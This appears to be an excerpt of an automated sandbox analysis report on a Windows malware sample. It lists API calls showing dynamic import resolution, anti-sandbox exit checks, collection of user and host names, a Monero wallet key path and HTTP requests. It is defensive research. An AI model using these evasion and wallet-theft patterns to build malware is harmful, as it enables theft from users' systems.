                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: 4e914ddb21cb4717ce0678e58724fdaf299d067f07c50ea0712dac5c4a5ef6a8
                        • Instruction ID: b1ef069a1e1e4ff6da622f7339ba0b905a565239822a79a800f829e16738f353
                        • Opcode Fuzzy Hash: 4e914ddb21cb4717ce0678e58724fdaf299d067f07c50ea0712dac5c4a5ef6a8
                        • Instruction Fuzzy Hash: F31233729101599ADB24EB94CCA6FEFBB38BF54300F50419BB50662191EF702F49CF66
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005C11B7), ref: 005D7880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D7887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 005D789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: 6e01709f55bec6e0f0624f035843c27bc3ee0b987550261b9992b611f414ab73
                        • Instruction ID: 57df30037b8be5a041d44012fda814bb9b80eeb6836b93c2e70115ee4a45ac3f
                        • Opcode Fuzzy Hash: 6e01709f55bec6e0f0624f035843c27bc3ee0b987550261b9992b611f414ab73
                        • Instruction Fuzzy Hash: 4EF04FB1944208ABC714DF98DD49BAEBBB8FB08711F10466AFA05A2780C77515048BA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: de495fbff3fa119fb3e3085f2bd896f489936471be20b61d51bfcd7d8722e5d2
                        • Instruction ID: df6228c58510a527cb0a362178874462a6a62226cbd878fbd7594b8213903798
                        • Opcode Fuzzy Hash: de495fbff3fa119fb3e3085f2bd896f489936471be20b61d51bfcd7d8722e5d2
                        • Instruction Fuzzy Hash: FBD05E7490030CDBCB04DFE0D849ADDBB78FB08311F000558D90562341EA305481CAA6

                        Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                        • GetProcAddress.KERNEL32(76210000,01495108), ref: 005D9C2D
                        • GetProcAddress.KERNEL32(76210000,014950A8), ref: 005D9C45
                        • GetProcAddress.KERNEL32(76210000,014A8F80), ref: 005D9C5E
                        • GetProcAddress.KERNEL32(76210000,014A8CC8), ref: 005D9C76
                        • GetProcAddress.KERNEL32(76210000,014A8D28), ref: 005D9C8E
                        • GetProcAddress.KERNEL32(76210000,014AEA10), ref: 005D9CA7
                        • GetProcAddress.KERNEL32(76210000,0149A798), ref: 005D9CBF
                        • GetProcAddress.KERNEL32(76210000,014AEA28), ref: 005D9CD7
                        • GetProcAddress.KERNEL32(76210000,014AE950), ref: 005D9CF0
                        • GetProcAddress.KERNEL32(76210000,014AEA40), ref: 005D9D08
                        • GetProcAddress.KERNEL32(76210000,014AEA88), ref: 005D9D20
                        • GetProcAddress.KERNEL32(76210000,014951E8), ref: 005D9D39
                        • GetProcAddress.KERNEL32(76210000,01495208), ref: 005D9D51
                        • GetProcAddress.KERNEL32(76210000,014952E8), ref: 005D9D69
                        • GetProcAddress.KERNEL32(76210000,01494FC8), ref: 005D9D82
                        • GetProcAddress.KERNEL32(76210000,014AE8D8), ref: 005D9D9A
                        • GetProcAddress.KERNEL32(76210000,014AE938), ref: 005D9DB2
                        • GetProcAddress.KERNEL32(76210000,0149A720), ref: 005D9DCB
                        • GetProcAddress.KERNEL32(76210000,01495068), ref: 005D9DE3
                        • GetProcAddress.KERNEL32(76210000,014AE920), ref: 005D9DFB
                        • GetProcAddress.KERNEL32(76210000,014AEA58), ref: 005D9E14
                        • GetProcAddress.KERNEL32(76210000,014AE830), ref: 005D9E2C
                        • GetProcAddress.KERNEL32(76210000,014AE8A8), ref: 005D9E44
                        • GetProcAddress.KERNEL32(76210000,01495028), ref: 005D9E5D
                        • GetProcAddress.KERNEL32(76210000,014AE980), ref: 005D9E75
                        • GetProcAddress.KERNEL32(76210000,014AEAE8), ref: 005D9E8D
                        • GetProcAddress.KERNEL32(76210000,014AE860), ref: 005D9EA6
                        • GetProcAddress.KERNEL32(76210000,014AE9B0), ref: 005D9EBE
                        • GetProcAddress.KERNEL32(76210000,014AE908), ref: 005D9ED6
                        • GetProcAddress.KERNEL32(76210000,014AE968), ref: 005D9EEF
                        • GetProcAddress.KERNEL32(76210000,014AE878), ref: 005D9F07
                        • GetProcAddress.KERNEL32(76210000,014AEA70), ref: 005D9F1F
                        • GetProcAddress.KERNEL32(76210000,014AE800), ref: 005D9F38
                        • GetProcAddress.KERNEL32(76210000,0149FDA8), ref: 005D9F50
                        • GetProcAddress.KERNEL32(76210000,014AE998), ref: 005D9F68
                        • GetProcAddress.KERNEL32(76210000,014AE8C0), ref: 005D9F81
                        • GetProcAddress.KERNEL32(76210000,01495248), ref: 005D9F99
                        • GetProcAddress.KERNEL32(76210000,014AE848), ref: 005D9FB1
                        • GetProcAddress.KERNEL32(76210000,014950C8), ref: 005D9FCA
                        • GetProcAddress.KERNEL32(76210000,014AEAA0), ref: 005D9FE2
                        • GetProcAddress.KERNEL32(76210000,014AE890), ref: 005D9FFA
                        • GetProcAddress.KERNEL32(76210000,01495288), ref: 005DA013
                        • GetProcAddress.KERNEL32(76210000,01494FE8), ref: 005DA02B
                        • LoadLibraryA.KERNEL32(014AE818,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA03D
                        • LoadLibraryA.KERNEL32(014AE8F0,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA04E
                        • LoadLibraryA.KERNEL32(014AEAB8,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA060
                        • LoadLibraryA.KERNEL32(014AEAD0,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA072
                        • LoadLibraryA.KERNEL32(014AE9C8,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA083
                        • LoadLibraryA.KERNEL32(014AE9E0,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA095
                        • LoadLibraryA.KERNEL32(014AE9F8,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA0A7
                        • LoadLibraryA.KERNEL32(014AED28,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA0B8
                        • GetProcAddress.KERNEL32(751E0000,01495008), ref: 005DA0DA
                        • GetProcAddress.KERNEL32(751E0000,014AEB18), ref: 005DA0F2
                        • GetProcAddress.KERNEL32(751E0000,014A8B78), ref: 005DA10A
                        • GetProcAddress.KERNEL32(751E0000,014AECB0), ref: 005DA123
                        • GetProcAddress.KERNEL32(751E0000,01495048), ref: 005DA13B
                        • GetProcAddress.KERNEL32(73FB0000,0149A4C8), ref: 005DA160
                        • GetProcAddress.KERNEL32(73FB0000,01495628), ref: 005DA179
                        • GetProcAddress.KERNEL32(73FB0000,0149A680), ref: 005DA191
                        • GetProcAddress.KERNEL32(73FB0000,014AEC08), ref: 005DA1A9
                        • GetProcAddress.KERNEL32(73FB0000,014AED10), ref: 005DA1C2
                        • GetProcAddress.KERNEL32(73FB0000,014954A8), ref: 005DA1DA
                        • GetProcAddress.KERNEL32(73FB0000,014953C8), ref: 005DA1F2
                        • GetProcAddress.KERNEL32(73FB0000,014AED40), ref: 005DA20B
                        • GetProcAddress.KERNEL32(753A0000,01495488), ref: 005DA22C
                        • GetProcAddress.KERNEL32(753A0000,014954C8), ref: 005DA244
                        • GetProcAddress.KERNEL32(753A0000,014AED58), ref: 005DA25D
                        • GetProcAddress.KERNEL32(753A0000,014AEBD8), ref: 005DA275
                        • GetProcAddress.KERNEL32(753A0000,01495448), ref: 005DA28D
                        • GetProcAddress.KERNEL32(76310000,0149A608), ref: 005DA2B3
                        • GetProcAddress.KERNEL32(76310000,0149A568), ref: 005DA2CB
                        • GetProcAddress.KERNEL32(76310000,014AEB60), ref: 005DA2E3
                        • GetProcAddress.KERNEL32(76310000,01495408), ref: 005DA2FC
                        • GetProcAddress.KERNEL32(76310000,01495528), ref: 005DA314
                        • GetProcAddress.KERNEL32(76310000,0149A8B0), ref: 005DA32C
                        • GetProcAddress.KERNEL32(76910000,014AEB78), ref: 005DA352
                        • GetProcAddress.KERNEL32(76910000,01495548), ref: 005DA36A
                        • GetProcAddress.KERNEL32(76910000,014A8AC8), ref: 005DA382
                        • GetProcAddress.KERNEL32(76910000,014AEBA8), ref: 005DA39B
                        • GetProcAddress.KERNEL32(76910000,014AED70), ref: 005DA3B3
                        • GetProcAddress.KERNEL32(76910000,01495348), ref: 005DA3CB
                        • GetProcAddress.KERNEL32(76910000,01495368), ref: 005DA3E4
                        • GetProcAddress.KERNEL32(76910000,014AEBF0), ref: 005DA3FC
                        • GetProcAddress.KERNEL32(76910000,014AED88), ref: 005DA414
                        • GetProcAddress.KERNEL32(75B30000,01495668), ref: 005DA436
                        • GetProcAddress.KERNEL32(75B30000,014AEB90), ref: 005DA44E
                        • GetProcAddress.KERNEL32(75B30000,014AEDA0), ref: 005DA466
                        • GetProcAddress.KERNEL32(75B30000,014AECC8), ref: 005DA47F
                        • GetProcAddress.KERNEL32(75B30000,014AEC20), ref: 005DA497
                        • GetProcAddress.KERNEL32(75670000,01495568), ref: 005DA4B8
                        • GetProcAddress.KERNEL32(75670000,01495648), ref: 005DA4D1
                        • GetProcAddress.KERNEL32(76AC0000,01495588), ref: 005DA4F2
                        • GetProcAddress.KERNEL32(76AC0000,014AEC98), ref: 005DA50A
                        • GetProcAddress.KERNEL32(6F4E0000,014955E8), ref: 005DA530
                        • GetProcAddress.KERNEL32(6F4E0000,014955A8), ref: 005DA548
                        • GetProcAddress.KERNEL32(6F4E0000,014956E8), ref: 005DA560
                        • GetProcAddress.KERNEL32(6F4E0000,014AEDB8), ref: 005DA579
                        • GetProcAddress.KERNEL32(6F4E0000,01495608), ref: 005DA591
                        • GetProcAddress.KERNEL32(6F4E0000,01495688), ref: 005DA5A9
                        • GetProcAddress.KERNEL32(6F4E0000,014955C8), ref: 005DA5C2
                        • GetProcAddress.KERNEL32(6F4E0000,014956A8), ref: 005DA5DA
                        • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 005DA5F1
                        • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 005DA607
                        • GetProcAddress.KERNEL32(75AE0000,014AEC50), ref: 005DA629
                        • GetProcAddress.KERNEL32(75AE0000,014A8C68), ref: 005DA641
                        • GetProcAddress.KERNEL32(75AE0000,014AEDD0), ref: 005DA659
                        • GetProcAddress.KERNEL32(75AE0000,014AEC38), ref: 005DA672
                        • GetProcAddress.KERNEL32(76300000,014953E8), ref: 005DA693
                        • GetProcAddress.KERNEL32(6FE30000,014AEB48), ref: 005DA6B4
                        • GetProcAddress.KERNEL32(6FE30000,01495388), ref: 005DA6CD
                        • GetProcAddress.KERNEL32(6FE30000,014AEBC0), ref: 005DA6E5
                        • GetProcAddress.KERNEL32(6FE30000,014AEC68), ref: 005DA6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 60ac59c1a6e269a9eb63dd5fbf90823dba02027145233ef13323617637521769
                        • Instruction ID: f20ce685e91f5b58a075e862ce63b30a5968ca166ad7c11c6e0948840e25e134
                        • Opcode Fuzzy Hash: 60ac59c1a6e269a9eb63dd5fbf90823dba02027145233ef13323617637521769
                        • Instruction Fuzzy Hash: F4620BB6610300AFD3DCDFA8ED889663BF9F78D701714C52AA649C3264D73A9841DF62

                        Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005C4839
                          • Part of subcall function 005C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005C4849
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • InternetOpenA.WININET(005E0DFE,00000001,00000000,00000000,00000000), ref: 005C62E1
                        • StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C6303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005C6335
                        • HttpOpenRequestA.WININET(00000000,GET,?,014B0588,00000000,00000000,00400100,00000000), ref: 005C6385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005C63BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005C63D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005C63FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005C646D
                        • InternetCloseHandle.WININET(00000000), ref: 005C64EF
                        • InternetCloseHandle.WININET(00000000), ref: 005C64F9
                        • InternetCloseHandle.WININET(00000000), ref: 005C6503
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 1124b6eb7ecffb9013d2ea809bfea568fc08e3880b7b75310fc2de1b79ebd82d
                        • Instruction ID: cb9a86c9b17cefc985a7f17052626c6e7ecc67202cf922c2d91a8ad90ebba86a
                        • Opcode Fuzzy Hash: 1124b6eb7ecffb9013d2ea809bfea568fc08e3880b7b75310fc2de1b79ebd82d
                        • Instruction Fuzzy Hash: CB712C71A00258AFDB28DBE4CC99FEE7B74BB44700F108559F50A6B290DBB46A85CF51

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005DA820: lstrlen.KERNEL32(005C4F05,?,?,005C4F05,005E0DDE), ref: 005DA82B
                          • Part of subcall function 005DA820: lstrcpy.KERNEL32(005E0DDE,00000000), ref: 005DA885
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005D5644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005D56A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005D5857
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005D51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005D5228
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005D5318
                          • Part of subcall function 005D52C0: lstrlen.KERNEL32(00000000), ref: 005D532F
                          • Part of subcall function 005D52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 005D5364
                          • Part of subcall function 005D52C0: lstrlen.KERNEL32(00000000), ref: 005D5383
                          • Part of subcall function 005D52C0: lstrlen.KERNEL32(00000000), ref: 005D53AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005D578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005D5940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005D5A0C
                        • Sleep.KERNEL32(0000EA60), ref: 005D5A1B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 28fd8635bced8cdb6b378f71cf32b279d74a75ab4c0e5974f16d4a9664a85856
                        • Instruction ID: 8ba83b07ca0485dd99febe5be08db0313af7c73c0ad9f452b2e67970c7119239
                        • Opcode Fuzzy Hash: 28fd8635bced8cdb6b378f71cf32b279d74a75ab4c0e5974f16d4a9664a85856
                        • Instruction Fuzzy Hash: B5E166729101459ACB28FBB8DC5AEFE7B38BF94300F50812BB40656291FF345B49DB96

                        Control-flow Graph

                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 005D17C5
                        • ExitProcess.KERNEL32 ref: 005D17D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: a82569da3e92dc05523a084d344dbbf577ce4f534a390cb63621b4c9022b8a6d
                        • Instruction ID: 8e1a3fa537d87c83bd0ef4ded5580289729a45be8feb2fa72f4958416093b4cb
                        • Opcode Fuzzy Hash: a82569da3e92dc05523a084d344dbbf577ce4f534a390cb63621b4c9022b8a6d
                        • Instruction Fuzzy Hash: 87517CB4A00209FBCB18DFA9D964ABE7BB5BF44304F10945BE406A7380D770EA51DB66

                        Control-flow Graph

                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 005D7542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005D757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D760A
                        • wsprintfA.USER32 ref: 005D7640
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$^
                        • API String ID: 1544550907-519173996
                        • Opcode ID: a3509f9ce39c92af9889f64216dc50ed07b875a449d1c743110031a44ab2a492
                        • Instruction ID: 03897363387a0aeb4784af2fae56d28b5048c274046e42c4848dd416170c7f6b
                        • Opcode Fuzzy Hash: a3509f9ce39c92af9889f64216dc50ed07b875a449d1c743110031a44ab2a492
                        • Instruction Fuzzy Hash: 4A4183B1D04358ABDB20DF98DC45BEEBBB4BB48700F10409AF50567280E775AA44CBA5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1608), ref: 005D98A1
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1680), ref: 005D98BA
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A15A8), ref: 005D98D2
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1560), ref: 005D98EA
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A15C0), ref: 005D9903
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A8B38), ref: 005D991B
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,01495088), ref: 005D9933
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,01494F48), ref: 005D994C
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1728), ref: 005D9964
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1590), ref: 005D997C
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1698), ref: 005D9995
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A1740), ref: 005D99AD
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,01495148), ref: 005D99C5
                          • Part of subcall function 005D9860: GetProcAddress.KERNEL32(76210000,014A16B0), ref: 005D99DE
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005C11D0: ExitProcess.KERNEL32 ref: 005C1211
                          • Part of subcall function 005C1160: GetSystemInfo.KERNEL32(?), ref: 005C116A
                          • Part of subcall function 005C1160: ExitProcess.KERNEL32 ref: 005C117E
                          • Part of subcall function 005C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005C112B
                          • Part of subcall function 005C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 005C1132
                          • Part of subcall function 005C1110: ExitProcess.KERNEL32 ref: 005C1143
                          • Part of subcall function 005C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005C123E
                          • Part of subcall function 005C1220: __aulldiv.LIBCMT ref: 005C1258
                          • Part of subcall function 005C1220: __aulldiv.LIBCMT ref: 005C1266
                          • Part of subcall function 005C1220: ExitProcess.KERNEL32 ref: 005C1294
                          • Part of subcall function 005D6770: GetUserDefaultLangID.KERNEL32 ref: 005D6774
                          • Part of subcall function 005C1190: ExitProcess.KERNEL32 ref: 005C11C6
                          • Part of subcall function 005D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005C11B7), ref: 005D7880
                          • Part of subcall function 005D7850: RtlAllocateHeap.NTDLL(00000000), ref: 005D7887
                          • Part of subcall function 005D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 005D789F
                          • Part of subcall function 005D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7910
                          • Part of subcall function 005D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 005D7917
                          • Part of subcall function 005D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 005D792F
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014A8C28,?,005E110C,?,00000000,?,005E1110,?,00000000,005E0AEF), ref: 005D6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005D6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 005D6AF9
                        • Sleep.KERNEL32(00001770), ref: 005D6B04
                        • CloseHandle.KERNEL32(?,00000000,?,014A8C28,?,005E110C,?,00000000,?,005E1110,?,00000000,005E0AEF), ref: 005D6B1A
                        • ExitProcess.KERNEL32 ref: 005D6B22
